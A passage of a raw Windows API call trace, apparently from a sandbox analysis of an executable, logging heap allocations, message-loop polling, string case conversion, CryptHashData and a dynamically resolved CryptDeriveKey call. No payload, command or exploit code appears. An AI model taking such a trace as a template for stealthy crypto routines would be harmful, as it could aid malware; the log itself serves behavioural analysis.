(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.509] CryptHashData (hHash=0xaa57a0, pbData=0x24b1778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.510] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.510] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.510] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.510] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.510] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.511] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.511] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.511] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.515] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.517] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 1 [0198.517] TranslateMessage (lpMsg=0x8bef60) returned 0 [0198.517] DispatchMessageW (lpMsg=0x8bef60) returned 0x0 [0198.517] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0198.517] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0198.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9b70 [0198.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9b70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.527] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.528] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.530] HeapFree (in: hHeap=0x25c0000, 